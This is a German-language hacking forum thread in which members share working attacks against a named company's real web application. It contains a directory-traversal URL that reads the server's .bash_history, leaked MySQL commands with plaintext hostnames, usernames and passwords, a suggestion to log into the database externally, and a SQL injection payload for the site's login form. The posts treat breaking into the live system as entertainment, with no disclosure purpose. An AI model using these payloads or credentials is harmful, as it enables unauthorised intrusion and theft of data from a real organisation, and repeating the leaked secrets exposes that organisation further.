Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[LFI] Hagebau.com

- - - - -
Erstellt von Klaus ,
lfi

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
Klaus
Geschrieben 22 August 2017 - 23:56 Uhr

Klaus

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    34
  • 59 Beiträge
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Viel spaß!

 

Please Login HERE or Register HERE to see this link!

 

:)


  • hacked, SecurityFlaw und Mini Rick gefällt das
Thanked by 1 Member:
killer555

#2
Zero-X
Geschrieben 23 August 2017 - 13:43 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    129
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

In der .bash_history stehen auch ein paar interessante Dinge.

URL:

https://transporter.hagebau.com/index.php?site=../../../../.bash_history%00

Beispiel:

mysqldump -h ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysqldump -h mysql5.ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transport.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transporter.sql

Das sind Zugangsdaten zu einer MySQL-Datenbank. Vielleicht besteht die Möglichkeit sich extern einzuloggen.

Im Verzeichnis "./sqladmin" findet man zwar einen phpMyAdmin-Login aber für den braucht man laut Domainfactory das Kundenmenüpasswort.


  • Klaus gefällt das

#3
Klaus
Geschrieben 23 August 2017 - 13:53 Uhr

Klaus

    Hacktivist

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    34
  • 59 Beiträge
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Interessant. Ich habe weiter keine Ahnung von LFI's. Leider. :D


#4
ProHex
Geschrieben 26 August 2017 - 02:34 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    223
  • 223 Beiträge
  • 199 Bedankt

Übersehe ich hier was oder ist das keine inlcusion sondern ein Directory Traversal?


#5
SecurityFlaw
Geschrieben 26 August 2017 - 23:11 Uhr

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
    • Likes
    213
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Falls die DB keinen externen Zugriff zulässt könnte man es hier auch noch versuchen.

 

SQLI:

https://transporter.hagebau.com/index.php?site=login | POST: loginname=xxx123'&password=xxx123&submit_login=anmelden

Bearbeitet von SecurityFlaw, 26 August 2017 - 23:11 Uhr.

  • Klaus gefällt das
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 65 Mitglied(ern) gelesen


    13fuckthepolice12, 3eyes, aaaaaa, abuleyla, aleks, B1nary, Bot4ng, Bulldogge67, clusterhead, CM1, Cryptologic, decent, dep0x, desmond, Dicklessde, Dr. Spic, dvalar, elcapitano, Elvisss, Exynos, FatalityMods, Framerater, Franziskaner, gtawelt, hacked, Hansiberg, Haxlor, Haxor33, HbmHE, heycaptain, JohnR, KimJongun, kiwitone, Klaus, kleinkriminell, L!x, Laggy, leonalexkraus, lolorollo, loziov1, Makiavelic, malicious, MarkSantos, mesagio, Mini Rick, most_uniQue, nibble nibble, p.samson, PadX18, PaulaAbdul, Payload, PHIPU, ProHex, Psykoon303, Schax, SecurityFlaw, SepaX, sitb, Snapfish, SonnyBlack, syncing, TuttiFrutti, VerZus, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking